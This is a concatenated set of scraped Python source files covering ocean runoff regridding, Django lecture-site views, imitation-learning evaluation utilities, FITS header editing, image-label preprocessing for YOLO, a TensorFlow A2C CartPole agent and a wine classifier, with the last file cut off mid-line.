np.array(littoral_idx).T + 1, \\\n ocn_lon, ocn_lat)\n net_flow2 = np.sum(runoff)\n print(\"flow before\", net_flow)\n print(\"regridded flow\", net_flow2)\n\n # Runoff_raw for debugging\n# nc.variables[dst_varname][it] = runoff\n## zero out contribution from outside the domain\n runoff[0,:] = 0\n runoff[:,-1] = 0\n net_flow3 = np.sum(runoff)\n print(\"final flow\", net_flow3)\n runoff = runoff * 1000.0 / area_dst # convert units\n nc.variables['Runoff'][it] = runoff\n\n # close destination file\n nc.close()\n\n","sub_path":"examples/Hill_runoff/old_MOM6/remap_river.py","file_name":"remap_river.py","file_ext":"py","file_size_in_byte":4601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"297286169","text":"from django.utils import timezone\nfrom .models import Lection, Author, Theme, User_reg\nfrom django.shortcuts import redirect, render, get_object_or_404\nfrom django.http import JsonResponse, HttpResponse\nfrom rest_framework.renderers import JSONRenderer\nfrom rest_framework.parsers import JSONParser\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom .forms import AuthorForm, LectionForm \nfrom .serializers import LectionSerializer, ALectionSerializer, AuthorSerializer, LAuthorSerializer\nfrom django.contrib.auth.decorators import login_required \nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.models import User \nfrom rest_framework.authentication import BasicAuthentication, TokenAuthentication\nfrom rest_framework.authtoken.models import Token\nfrom functools import wraps\n\n\ndef json_meta(message,serializerData):\n data = {\n 'meta':{\n 'status': 'success',\n 'count': 1,\n 'total_count': 1,\n 'notice': message\n },\n 'data': serializerData\n }\n return data \n\ndef json_meta_list(amount,order,serializerData):\n data = {\n 'meta':{\n 'status': 'success',\n 'count': 1,\n 'total_count': 1,\n 'amount': amount,\n 'filter': order,\n 'notice': ''\n },\n 'data': serializerData\n }\n return data \n\ndef json_meta_del(message):\n data = {\n 'meta':{\n 'status': 'success',\n 'count': 1,\n 'total_count': 1,\n 'notice': message\n }\n }\n return data \n\ndef check_token(view_func):\n def _decorator(request, *args, **kwargs):\n if request.META.has_key('HTTP_AUTHORIZATION'):\n if request.META['HTTP_AUTHORIZATION'].split()[0] != 'Token':\n return None\n key = request.META['HTTP_AUTHORIZATION'].split()[1]\n user = Token.objects.get(key=key).user\n if user:\n request.user = user \n response = view_func(request, *args, **kwargs)\n \n if request.META.has_key('HTTP_AUTHORIZATION'):\n request.user = None \n return response\n return wraps(view_func)(_decorator) \n\n\n\ndef lection_list(request):\n amount = request.GET.get('amount', 5)\n page = request.GET.get('page')\n order = request.GET.get('filter', 'new')\n if order == 'old':\n lectures = Lection.objects.filter(created_date__lte=timezone.now()).order_by('created_date')\n else:\n lectures = Lection.objects.filter(created_date__lte=timezone.now()).order_by('-created_date')\n p = Paginator(lectures, amount)\n try:\n lectures = p.page(page)\n except PageNotAnInteger:\n lectures = p.page(1) \n except EmptyPage:\n lectures = p.page(p.num_pages) \n if request.META['HTTP_ACCEPT'] == \"application/json\":\n json_obj = []\n for lect in lectures: \n json_obj.append(lect.as_json()) \n lections = LectionSerializer(lectures, many=True).data\n wrap = json_meta_list(amount, order, lections) \n return JsonResponse(wrap,safe=False)\n else:\n return render(request, 'lections/lection_list.html', {'lectures':lectures, 'amount':amount})\n\ndef detail(request, pk):\n lection = get_object_or_404(Lection, pk=pk)\n if request.user.is_authenticated():\n user = User_reg.objects.get(id=request.user.id)\n if request.method == 'GET':\n count = len(User_reg.objects.filter(favorit__pk=lection.pk))\n if request.user.is_authenticated():\n is_favorit = Lection.objects.filter(pk=pk,user_reg__id=user.id)\n if request.META['HTTP_ACCEPT'] == \"application/json\":\n lect = LectionSerializer(lection).data\n wrap = json_meta('',lect)\n return JsonResponse(wrap, safe=False)\n elif request.user.is_authenticated():\n return render(request, 'lections/detail.html', {'lection':lection, 'count':count, 'is_favorit':is_favorit})\n else:\n return render(request, 'lections/detail.html', {'lection':lection, 'count':count})\n elif request.method == 'DELETE': \n lection.delete()\n if request.META['HTTP_ACCEPT'] == \"application/json\":\n wrap = json_meta_del('Lecture successfully deleted')\n return JsonResponse(wrap) \n else:\n return HttpResponse('Successfully deleted') \n\n@check_token\n@login_required\ndef new_lect(request):\n if request.method == 'POST':\n form = LectionForm(request.POST)\n if form.is_valid():\n lection = form.save()\n lection.created_date = timezone.now()\n lection.save()\n if request.META['HTTP_ACCEPT'] == \"application/json\":\n lect = LectionSerializer(lection).data\n wrap = json_meta('Lecture was successfully created',lect)\n return JsonResponse(wrap, safe=False)\n else:\n return redirect('lections.views.detail', pk=lection.pk)\n else:\n form = LectionForm()\n return render(request, 'lections/new_lect.html', {'form': form}) \n\n@check_token\n@login_required\ndef edit_lect(request,pk):\n lection = get_object_or_404(Lection, pk=pk)\n if request.method == 'PUT':\n form = LectionForm(request.PUT, instance=lection)\n if form.is_valid():\n lection = form.save()\n lection.created_date = timezone.now()\n lection.save()\n if request.META['HTTP_ACCEPT'] == \"application/json\":\n lect = LectionSerializer(lection).data\n wrap = json_meta('Lecture was successfully updated',lect)\n return JsonResponse(wrap, safe=False)\n else:\n return render(request, 'lections/detail.html', {'lection':lection})\n elif request.method == 'POST':\n form = LectionForm(request.POST, instance=lection)\n if form.is_valid():\n lection = form.save()\n lection.created_date = timezone.now()\n lection.save()\n return redirect('lections.views.detail', pk=lection.pk)\n else:\n form = LectionForm(instance=lection)\n return render(request, 'lections/new_lect.html', {'form': form}) \n\n@check_token\n@login_required\ndef del_lect(request,pk):\n if request.user.is_superuser == True:\n lection = get_object_or_404(Lection, pk=pk)\n lection.delete()\n return redirect('lections.views.lection_list') \n else:\n return redirect('/login') \n \n\ndef authors(request, pk): \n lection = get_object_or_404(Lection, pk=pk)\n if request.method == 'GET': \n authors = lection.authors.all() \n if request.META['HTTP_ACCEPT'] == \"application/json\":\n json_obj = []\n for aut in authors:\n json_obj.append(aut.as_json())\n auth = LAuthorSerializer(authors, many=True).data\n wrap = json_meta('',auth)\n return JsonResponse(wrap, safe=False) \n else:\n return render(request, 'lections/authors.html', {'authors':authors}) \n if request.method == 'PUT': \n author_ids = []\n author_ids = request.PUT.getlist(\"author_ids[]\")\n not_author_ids = []\n not_author_ids = request.PUT.getlist(\"not_author_ids[]\")\n for aut in author_ids:\n a1 = Author.objects.get(id=aut)\n lection.authors.add(a1) \n for naut in not_author_ids:\n a2 = Author.objects.get(id=naut)\n lection.authors.remove(a2) \n authors = lection.authors.all() \n if request.META['HTTP_ACCEPT'] == \"application/json\":\n json_obj = []\n for aut in authors:\n json_obj.append(aut.as_json())\n auth = LAuthorSerializer(authors, many=True).data\n wrap = json_meta('',auth)\n return JsonResponse(wrap, safe=False) \n else:\n return render(request, 'lections/authors.html', {'authors':authors}) \n\ndef authors_list(request):\n authors = Author.objects.order_by('first_name')\n if request.META['HTTP_ACCEPT'] == \"application/json\":\n json_obj = []\n for aut in authors:\n json_obj.append(aut.as_json())\n auth = LAuthorSerializer(authors, many=True).data\n wrap = json_meta('',auth)\n return JsonResponse(wrap, safe=False) \n else:\n return render(request, 'lections/authors_list.html', {'authors':authors})\n\ndef authors_detail(request, pk): \n author = get_object_or_404(Author, pk=pk) \n lections = author.lection_set.all() \n if request.META['HTTP_ACCEPT'] == \"application/json\":\n auth = AuthorSerializer(author).data\n wrap = json_meta('',auth)\n return JsonResponse(wrap, safe=False) \n else:\n return render(request, 'lections/authors_detail.html', {'author':author})\n\n@check_token\n@login_required\ndef new_auth(request):\n if request.method == 'POST':\n form = AuthorForm(request.POST)\n if form.is_valid():\n author = form.save(commit=False)\n author.save()\n if request.META['HTTP_ACCEPT'] == \"application/json\":\n auth = LAuthorSerializer(author).data\n wrap = json_meta('New author was successfully created',auth)\n return JsonResponse(wrap, safe=False) \n else: \n return redirect('lections.views.authors_list')\n else: \n form = AuthorForm()\n return render(request, 'lections/new_auth.html', {'form': form}) \n\n\n@check_token\n@login_required\ndef add_to_fav(request, pk): \n lection = get_object_or_404(Lection, pk=pk)\n user = User_reg.objects.get(id=request.user.id)\n user.favorit.add(lection)\n return redirect('lections.views.detail', pk=lection.pk) \n\n@check_token\n@login_required\ndef remove_from_fav(request, pk): \n lection = get_object_or_404(Lection, pk=pk)\n user = User_reg.objects.get(id=request.user.id)\n user.favorit.remove(lection)\n return redirect('lections.views.detail', pk=lection.pk) \n\n\n","sub_path":"lections/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"578104542","text":"import numpy as np\nimport scipy.stats\nimport random\nimport IPython\nfrom sklearn.metrics import hinge_loss\n\ndef F2(env, pi1, pi2, sup, T, num_samples=1):\n losses = []\n for i in range(num_samples):\n # collect trajectory with states visited and actions taken by agent\n tmp_states, _, _, _ = collect_traj(env, pi1, T)\n tmp_actions = np.array([pi2.intended_action(s) for s in tmp_states])\n tmp_scores = np.array([pi2.decision_function(s) for s in tmp_states])\n sup_actions = np.array([sup.intended_action(s) for s in tmp_states])\n n = len(sup_actions)\n\n\n hinge = hinge_loss(sup_actions, tmp_scores)\n penalty = pi2.est.alpha * .5 * np.square(np.linalg.norm(pi2.est.coef_))\n print(\"hinge: \" + str(hinge))\n print(\"penalty: \" + str(penalty))\n errors = hinge / n + penalty\n\n # compute the mean error on that trajectory (may not be T samples since game ends early on failures)\n losses.append(np.mean(errors))\n\n # compute the mean and sem on averaged losses.\n return stats(losses)\n\ndef F(env, pi1, pi2, sup, T, num_samples=1):\n losses = []\n for i in range(num_samples):\n # collect trajectory with states visited and actions taken by agent\n tmp_states, _, _, _ = collect_traj(env, pi1, T)\n tmp_actions = np.array([pi2.intended_action(s) for s in tmp_states])\n sup_actions = np.array([sup.intended_action(s) for s in tmp_states])\n errors = 1.0 - np.mean(sup_actions == tmp_actions)\n # compute the mean error on that trajectory (may not be T samples since game ends early on failures)\n losses.append(np.mean(errors))\n\n # compute the mean and sem on averaged losses.\n return stats(losses)\n\ndef eval_agent_statistics_discrete(env, lnr, sup, T, num_samples=1):\n \"\"\"\n evaluate loss in the given environment along the agent's distribution\n for T timesteps on num_samples\n \"\"\"\n losses = []\n for i in range(num_samples):\n # collect trajectory with states visited and actions taken by agent\n tmp_states, _, tmp_actions, _ = collect_traj(env, lnr, T)\n sup_actions = np.array([sup.intended_action(s) for s in tmp_states])\n errors = 1.0 - np.mean(sup_actions == tmp_actions)\n # compute the mean error on that trajectory (may not be T samples since game ends early on failures)\n losses.append(np.mean(errors))\n\n # compute the mean and sem on averaged losses.\n return stats(losses)\n\ndef stats(losses):\n if len(losses) == 1: sem = 0.0\n else: sem = scipy.stats.sem(losses)\n\n d = {\n 'mean': np.mean(losses),\n 'sem': sem\n }\n return d\n\ndef ste(trial_rewards):\n if trial_rewards.shape[0] == 1:\n return np.zeros(trial_rewards.shape[1])\n return scipy.stats.sem(trial_rewards, axis=0)\n\ndef mean(trial_rewards):\n return np.mean(trial_rewards, axis=0)\n\n\ndef mean_sem(trial_data):\n s = ste(trial_data)\n m = mean(trial_data)\n return m, s\n\n\ndef evaluate_lnr_discrete(env, lnr, sup, T):\n stats = eval_agent_statistics_discrete(env, lnr, sup, T, 1)\n return stats['mean']\n\n\ndef collect_traj(env, agent, T, visualize=False):\n \"\"\"\n agent must have methods: sample_action and intended_action\n Run trajectory on sampled actions\n record states, sampled actions, intended actions and reward\n \"\"\"\n states = []\n intended_actions = []\n taken_actions = []\n infos = []\n\n env.reset()\n action = [0, 0]\n s, r, done, info = env.step(action)\n\n reward = 0.0\n\n\n for t in range(T):\n\n a_intended = agent.intended_action(s, info)\n a = agent.sample_action(s, info)\n next_s, r, done, next_info = env.step(a)\n reward += r\n\n states.append(s)\n infos.append(info)\n intended_actions.append(a_intended)\n taken_actions.append(a)\n\n s = next_s\n info = next_info\n\n if visualize:\n env.render()\n\n if done:\n break\n\n\n return states, intended_actions, taken_actions, reward, infos\n","sub_path":"tools/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":4059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"401143637","text":"\"\"\" Utility functions and classes for SRP\n\nContext : SRP\nModule : Fits.py\nVersion : 1.2.2\nAuthor : Stefano Covino\nDate : 18/05/2017\nE-mail : stefano.covino@brera.inaf.it\nURL: : http://www.merate.mi.astro.it/utenti/covino\n\nUsage : AddHeaderComment (fitsfile, commentlist, outfilename=None)\n \"fitfile\" is the FITS file name.\n \"commentlist\" is a list with the comments to add.\n \"outfilename\" optional filename for output. Else input file file is overwritten.\n \n Function returns two values: (res, code). If res is False code reports the problem \n (codes are in SRPFITS.FitsConstants). Else res is True.\n\nRemarks :\n\nHistory : (01/10/2010) First version.\n : (25/04/2011) Input and output file names can be different.\n : (27/04/2011) Always list in output.\n : (21/07/2014) Better management of non-standard FITS headers.\n : (31/07/2015) python3 porting.\n : (18/05/2017) astropy.io.fits\n\"\"\"\n\nimport warnings\n\nfrom astropy.io import fits\nfrom . import FitsConstants\n\ndef AddHeaderComment (fitsfile, commentlist, outfilename=None):\n try:\n hdr = fits.open(fitsfile)\n except IOError:\n return False,FitsConstants.FitsFileNotFound\n heder = hdr[0].header\n for i in commentlist:\n heder.add_comment(i)\n #\n warnings.resetwarnings()\n warnings.filterwarnings('ignore', category=UserWarning, append=True)\n warnings.filterwarnings('ignore', category=ResourceWarning, append=True)\n if outfilename == None:\n hdr.writeto(fitsfile,overwrite=True,output_verify='ignore')\n else:\n hdr.writeto(outfilename,overwrite=True,output_verify='ignore')\n warnings.resetwarnings() \n warnings.filterwarnings('always', category=UserWarning, append=True)\n warnings.filterwarnings('always', category=ResourceWarning, append=True)\n hdr.close()\n return True,FitsConstants.FitsOk\n","sub_path":"python3/SRPAstro/SRP.FITS/SRPFITS/Fits/AddHeaderComment.py","file_name":"AddHeaderComment.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"216739587","text":"#-*- coding:utf-8 -*-\r\nimport numpy as np\r\nimport matplotlib.plot_api as plt\r\n\r\n#you can write your code here\r\ndef draw():\r\n #get input data\r\n menMeans = (20, 35, 30, 35, 27)\r\n menStd = (2, 3, 4, 1, 2)\r\n womenMeans = (25, 32, 34, 20, 25)\r\n womenStd = (3, 5, 2, 3, 3)\r\n\r\n ind = np.arange(5)\r\n width = 0.35\r\n # the histogram of the data\r\n plt.bar(ind, menMeans, width, color='r')\r\n plt.bar(ind+width, womenMeans, width, color='y')\r\n #show image\r\n plt.savefig('fig.png')\r\n\r\n#the code should not be changed\r\nif __name__ == '__main__':\r\n draw()","sub_path":"examination/03.py","file_name":"03.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"567470724","text":"import numpy as np\nimport pandas as pd\nimport cv2\nimport os\n\n\nimgFormatList = [\"jpg\", \"jpeg\", \"png\"]\n\ndef getFilenameWoExt(Filename):\n return \".\".join(Filename.split('.')[:-1])\n\ndef getExt(Filename):\n return Filename.split('.')[-1].lower()\n\ndef getCSVName(dirPath):\n if dirPath[-1] == '/':\n return dirPath[:-1] + \".csv\"\n else:\n return dirPath + \".csv\"\n\ndef getBrand(dirPath):\n return dirPath[:-1].split('/')[-1]\n\ndef optimizeFolder(dirPath, etcPath, flag):\n \"\"\"\n flag = 0 means labelImg Program\n flag = 1 means VoTT Program\n \"\"\"\n if not os.path.isdir(etcPath):\n os.mkdir(etcPath)\n\n count = 0\n imgFilenameList = []\n txtFilenameList = []\n etcFilenameList = []\n\n if flag == 0: # labelImg\n # 텍스트 파일과 매칭되지 않는 파일 삭제\n FilenamesList = os.listdir(dirPath)\n \n for Filename in FilenamesList:\n ext = getExt(Filename)\n\n if ext == \"txt\":\n txtFilenameList.append(getFilenameWoExt(Filename))\n else:\n etcFilenameList.append(Filename)\n\n for etcFilename in etcFilenameList:\n if getFilenameWoExt(etcFilename) not in txtFilenameList:\n os.replace(dirPath + etcFilename, etcPath + etcFilename)\n count += 1\n\n txtFilenameList.clear()\n etcFilenameList.clear()\n\n # 이미지 파일과 매칭되지 않는 파일 삭제\n FilenamesList = os.listdir(dirPath)\n\n for Filename in FilenamesList:\n ext = getExt(Filename)\n\n if ext in imgFormatList:\n imgFilenameList.append(getFilenameWoExt(Filename))\n else:\n etcFilenameList.append(Filename)\n\n for etcFilename in etcFilenameList:\n if getFilenameWoExt(etcFilename) not in imgFilenameList:\n os.replace(dirPath + etcFilename, etcPath + etcFilename)\n count += 1\n\n imgFilenameList.clear()\n etcFilenameList.clear()\n elif flag == 1: # VoTT\n # csv 파일과 매칭되지 않는 이미지 삭제\n csvFileName = getCSVName(dirPath)\n df = pd.read_csv(csvFileName)\n \n FilenamesList = os.listdir(dirPath)\n\n for Filename in FilenamesList:\n if Filename not in df[['image']].values:\n os.replace(dirPath + Filename, etcPath + Filename)\n count += 1\n\n # 이미지 파일과 매칭되지 않는 csv row 삭제\n FilenamesList = os.listdir(dirPath)\n \n etcDf = pd.DataFrame(columns=df.columns)\n\n for imgName in df[['image']].values:\n imgName = imgName[0]\n \n if imgName not in FilenamesList:\n etcDf = etcDf.append(df[df.image == imgName])\n df = df[df.image != imgName]\n count += 1\n\n df.to_csv(csvFileName, index=False)\n etcDf.to_csv(etcPath + getCSVName(getBrand(dirPath)), index=False)\n else:\n raise Exception(\"Not supported flag Exception\")\n\n print(\"deleted {} file(s)\".format(count))\n\ndef labelImgYOLO2VoTTCSV(dirPath, etcPath, label):\n FilenameList = os.listdir(dirPath)\n csvFileName = getCSVName(dirPath)\n imgFilenameList = []\n imgname = None\n\n with open(csvFileName, 'w', errors='ignore') as out:\n out.write('\"image\",\"xmin\",\"ymin\",\"xmax\",\"ymax\",\"label\"\\n')\n\n for Filename in FilenameList:\n if getExt(Filename) in imgFormatList:\n imgFilenameList.append(Filename)\n\n for imgFilename in imgFilenameList:\n txtFilename = getFilenameWoExt(imgFilename) + \".txt\"\n img = cv2.imread(dirPath + imgFilename)\n try:\n img_y, img_x = img.shape[:2]\n except AttributeError as e:\n os.replace(dirPath + imgFilename, etcPath + imgFilename)\n os.replace(dirPath + txtFilename, etcPath + txtFilename)\n continue\n\n # with open(dirPath + txtFilename, 'r', errors='ignore') as textfile:\n with open(dirPath + txtFilename, 'r') as textfile:\n lines = textfile.readlines()\n for line in lines:\n x, y, w, h = line.split()[1:]\n x = float(x)\n y = float(y)\n w = float(w)\n h = float(h)\n out.write('\"{}\",{},{},{},{},{}\\n'.format(imgFilename, x * img_x - (w * img_x / 2), y * img_y - (h * img_y / 2), x * img_x + (w * img_x / 2), y * img_y + (h * img_y / 2), label))\n\ndef csvFloat2Int(dirPath):\n csvFileName = getCSVName(dirPath)\n df = pd.read_csv(csvFileName)\n df[['xmin', 'ymin', 'xmax', 'ymax', 'label']] = df[['xmin', 'ymin', 'xmax', 'ymax', 'label']].astype('uint16')\n df.to_csv(csvFileName, index = False)\n\ndef saveCroppedImg(dirPath, outPath):\n \"\"\"\n 'imgPath' is image folder path\n \"\"\"\n brand = getBrand(dirPath)\n csvFileName = getCSVName(dirPath)\n df = pd.read_csv(csvFileName)\n \n if not os.path.isdir(outPath):\n os.mkdir(outPath)\n \n for i in range(len(df)):\n sr = df.iloc[i]\n filePath = dirPath + sr['image']\n img = cv2.imread(filePath)\n\n if img is not None:\n croppedimg = img[sr['ymin']:sr['ymax'], sr['xmin']:sr['xmax']]\n cv2.imwrite(\"{}{}_{}_{}.png\".format(outPath, sr['label'], brand, i,), croppedimg)\n # cv2.rectangle(img, (sr['xmin'], sr['ymin']), (sr['xmax'], sr['ymax']), (0, 0, 255))\n # cv2.imshow(\"img\", img)\n # cv2.waitKey()\n # cv2.destroyAllWindows()\n else:\n print(\"****************************************\")\n print(\"*\", filePath, \"is None\")\n print(sr)\n print(\"****************************************\")\n\n if i % 100 == 0 and i != 0:\n print(\"{} / {} = {}%\".format(i, len(df), int(i / len(df) * 10000) / 100))\n\n print()\n\ndef voTTCSV2YOLOAnnoTxt(imgPath, csvFileList):\n outList = []\n\n for csvFile in csvFileList:\n prvImgName = None\n\n with open(imgPath + csvFile) as csvFileName:\n lines = csvFileName.readlines()\n lines = lines[1:] # 컬럼 제거\n\n for line in lines:\n splitted = line.split(',')\n splitted[-1] = splitted[-1].replace('\"', '') # remove double quote\n splitted[-1] = splitted[-1].replace('\\n', '') # delete newline\n splitted[1:] = list(map(float, splitted[1:])) # string to float\n splitted[1:] = list(map(int, splitted[1:])) # float to int\n splitted[1:] = list(map(str, splitted[1:])) # int to str\n\n if prvImgName != splitted[0]:\n splitted[1] = imgPath + csvFile[:-4] + \"/\" + splitted[0].replace('\"', '') # remove double quote\n splitted[1] = \" \".join(splitted[1:3]) # concat\n splitted[1] = \",\".join(splitted[1:]) # concat\n outList.append(splitted[1])\n else:\n outList[-1] = outList[-1] + \" \" + \",\".join(splitted[1:]) # concat\n\n prvImgName = splitted[0]\n\n with open(\"./train.txt\", 'w') as outfile:\n for line in outList:\n outfile.write(line + '\\n')\n\nimport os\nimport numpy as np\nimport cv2\nimport pandas as pd\n\ndef define(path, imgCount):\n img = os.listdir(path)\n \n c=[]\n tmpClass = []\n cls = []\n \n for i in range(len(img)):\n tmpClass.append(int(img[i][0]))\n \n for i in range(10):\n for j in range(tmpClass.index(i), tmpClass.index(i) + imgCount):\n b= cv2.imread(path + '{}'.format(img[j]))\n b = cv2.resize(b, dsize = (50, 50))\n b = b / 255\n c.append(b)\n cls.append(i)\n \n img = pd.DataFrame(cls, columns = ['class'])\n \n return c, img\n","sub_path":"src/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":7903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"266844899","text":"import scipy.signal\nimport time\nfrom tensorflow.contrib import layers\nimport tensorflow as tf\nimport gym\nimport yaml\n\nimport numpy as np\n\nfrom collections import namedtuple\nfrom collections import deque\n\nCONFIG = 'config_pg.yaml'\nVERBOSE = True\n\ndef _feed_forward(states, hiddens, output, activation=tf.tanh, activation_output=None):\n last_layer = states\n for hidden in hiddens:\n last_layer = layers.fully_connected(last_layer, hidden, activation_fn=activation)\n return layers.fully_connected(last_layer, output, activation_fn=activation_output)\n\nclass Model:\n\n def __init__(self, session, num_actions, config, scope, summaries_dir=None):\n self.session = session\n self.num_actions = num_actions\n self.config = config\n self.scope = scope\n self.summary_writer = None\n with tf.variable_scope(scope):\n self.states = tf.placeholder(tf.float32, shape=(None, 4))\n self.actions = tf.placeholder(tf.int32, shape=(None,))\n self.weights = tf.placeholder(tf.float32, shape=(None,))\n self.returns = tf.placeholder(tf.float32, shape=(None,))\n self.learning_rate = tf.placeholder_with_default(self.config['learning_rate'], shape=())\n\n self._build_network()\n\n def train(self, observations, actions, weights, returns):\n loss, _ = self.session.run(\n [self.loss, self.train_op],\n feed_dict={\n self.states: observations,\n self.actions: actions,\n self.weights: weights,\n self.returns: returns,\n })\n return loss\n\n def predict(self, observation):\n predictions, values = self.session.run(\n [self.predictions, self.values],\n feed_dict={\n self.states: observation,\n })\n return predictions, values\n\n def cleanup(self):\n pass\n\n def _minimize(self, optimizer):\n params = tf.trainable_variables(self.scope)\n gradients = tf.gradients(self.loss, params)\n self.gradients_norm = tf.global_norm(gradients)\n if self.config['clip_by_norm']:\n gradients, self.gradients_norm = tf.clip_by_global_norm(\n gradients, self.config['clip_by_norm'])\n gradients = list(zip(gradients, params))\n return optimizer.apply_gradients(gradients)\n\n def _build_network(self):\n logits = _feed_forward(self.states, [32], self.num_actions)\n self.predictions = tf.squeeze(tf.multinomial(logits=logits, num_samples=1), axis=1)\n\n action_masks = tf.one_hot(self.actions, self.num_actions)\n log_prob_v = tf.nn.log_softmax(logits)\n log_probs = tf.reduce_sum(action_masks * log_prob_v, axis=1)\n policy_loss = -tf.reduce_mean(self.weights * log_probs)\n\n self.values = _feed_forward(self.states, [32], 1)\n value_loss = tf.reduce_mean(tf.square(self.values - self.returns))\n self.loss = policy_loss + value_loss\n optimizer = tf.train.AdamOptimizer(learning_rate=self.learning_rate, epsilon=1e-3)\n self.train_op = self._minimize(optimizer)\n\n return\n\n\nclass Agent():\n\n def __init__(self, num_actions, config):\n self.num_actions = num_actions\n self.config = config\n\n tf.reset_default_graph()\n self.session = tf.Session()\n self.model = Model(self.session, num_actions, self.config, 'Model', self._get_summary_dir())\n self.session.run(tf.global_variables_initializer())\n return\n\n def choose_action(self, observation):\n predictions, _ = self.model.predict(np.array(observation, copy=False).reshape(1, -1))\n return predictions[0]\n\n def get_value(self, observation):\n _, values = self.model.predict(np.array(observation, copy=False).reshape(1, -1))\n return values[0][0]\n\n def train(self, observations, actions, weights, returns):\n loss = self.model.train(observations, actions, weights, returns)\n return loss\n\n def cleanup(self):\n self.model.cleanup()\n self.session.close()\n pass\n\n def _get_summary_dir(self):\n return None\n\n\ndef reward_to_go(x, gamma=1.):\n return scipy.signal.lfilter([1], [1, float(-gamma)], x[::-1], axis=0)[::-1]\n\n\nExperience = namedtuple('Experience',\n ('observation',\n 'action',\n 'reward_to_go',\n 'new_observation',\n 'episode_return',\n 'episode_length'))\n\n\ndef iterative_environment(env, agent, config):\n experience_length = config['experience_length']\n observations = deque(maxlen=experience_length)\n actions = deque(maxlen=experience_length)\n episode_rewards = []\n\n observation = env.reset()\n while True:\n action = agent.choose_action(observation)\n new_observation, reward, done, _ = env.step(action)\n observations.append(observation)\n observation = new_observation\n actions.append(action)\n episode_rewards.append(reward)\n\n weights = list(reward_to_go(episode_rewards[-experience_length:], config['gamma']))\n if done:\n for idx, weight in enumerate(weights):\n yield Experience(\n observations.popleft(),\n actions.popleft(),\n weight,\n None,\n sum(episode_rewards) if idx + 1 == len(weights) else None,\n len(episode_rewards))\n observations.clear()\n actions.clear()\n episode_rewards.clear()\n observation = env.reset()\n elif len(observations) == experience_length:\n yield Experience(observations[0], actions[0], weights[0], observation, None, None)\n return\n\ndef play_one_epoch_continuous_vectorized(iterative_vectorized_env, agent, config):\n experience_length = config['experience_length']\n gamma_multiplier = config['gamma']**experience_length\n\n observations = []\n actions = []\n weights = []\n returns = []\n episode_returns = []\n episode_lengths = []\n\n done = False\n while not done:\n for iterative_env in iterative_vectorized_env:\n experience = next(iterative_env)\n observations.append(experience.observation)\n actions.append(experience.action)\n observation_value = agent.get_value(experience.observation)\n new_observation = experience.new_observation\n if new_observation is not None:\n new_observation_value = agent.get_value(new_observation)\n returns.append(experience.reward_to_go + gamma_multiplier * new_observation_value)\n else:\n returns.append(experience.reward_to_go)\n weights.append(returns[-1] - observation_value)\n if experience.episode_return is not None:\n episode_returns.append(experience.episode_return)\n episode_lengths.append(experience.episode_length)\n if len(observations) == config['epoch_length']:\n done = True\n break\n\n weights = np.array(weights)\n weights -= np.mean(weights)\n weights/= np.std(weights)\n loss = agent.train(observations, actions, weights, returns)\n return loss, episode_returns, episode_lengths\n\n\ndef play_continuous_vectorized(vectorized_env, agent, config):\n start_time = time.time()\n iterative_vectorized_env = [iterative_environment(\n env, agent, config) for env in vectorized_env]\n for epoch in range(config['epochs']):\n loss, episode_returns, episode_lengths = play_one_epoch_continuous_vectorized(\n iterative_vectorized_env, agent, config)\n print('Epoch: {:3d}, loss: {:.3f}, returns: {:.3f}, lengths: {:.3f}'.format(\n epoch, loss, np.mean(episode_returns), np.mean(episode_lengths)))\n print('Finished in {} seconds'.format(time.time() - start_time))\n\n\ndef main():\n with open(CONFIG) as reader:\n config = yaml.safe_load(reader)\n\n vectorized_env = [gym.make(config['environment']) for _ in range(config['num_env'])]\n num_actions = vectorized_env[0].action_space.n\n\n agent = Agent(num_actions, config)\n play_continuous_vectorized(vectorized_env, agent, config)\n agent.cleanup()\n return\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"PG_experiments/main_a2c_vectorized_cartpole.py","file_name":"main_a2c_vectorized_cartpole.py","file_ext":"py","file_size_in_byte":7736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"589102463","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 27 11:13:28 2018\n\n@author: dlf43\n\"\"\"\n\nimport csv\nfrom sklearn.tree import DecisionTreeClassifier\n\n\ndata_file = {\n 'train': 'train.csv',\n 'test': 'test.csv',\n 'result': 'test_prediction.csv',\n }\n\n\ndef load_data(file: str, train=True):\n if train:\n train_info, wine_category = [], []\n with open(file) as csvfile:\n data = csv.reader(csvfile)\n for row in data:\n train_info.append(row[1:-1])\n wine_category.append(row[-1])\n \n train_info = train_info[1:]\n wine_category = wine_category[1:]\n for i in range(3500):\n for j in range(12):\n train_info[i][j] = float(train_info[i][j])\n wine_category[i] = int(wine_category[i])\n return train_info, wine_category\n else:\n wine_id, test_info = [], []\n with open(file) as csvfile:\n data = csv.reader(csvfile)\n for row in data:\n wine_id.append(row[0])\n test_info.append(row[1:-1])\n \n wine_id = wine_id[1:]\n test_info = test_info[1:]\n for i in range(1500):\n for j in range(12):\n test_info[i][j] = float(test_info[i][j])\n wine_id[i] = int(wine_id[i])\n return wine_id, test_info\n \n\ndef func():\n # Train the Classifier\n clf = DecisionTreeClassifier(criterion=\"gini\")\n train_info, train_category = load_data(data_file['train'])\n clf.fit(train_info, train_category)\n \n # Predict the Wine\n wine_id, test_info = load_data(data_file['test'], train=False)\n result = clf.predict(test_info)\n \n # Show result\n pairs = []\n for ii in zip(wine_id, result):\n pairs.append(ii)\n pairs.sort()\n \n with open(data_file['result'], 'w') as csvfile:\n csvfile.write('%s,%s\\n' % ('id', 'type'))\n for p in pairs:\n 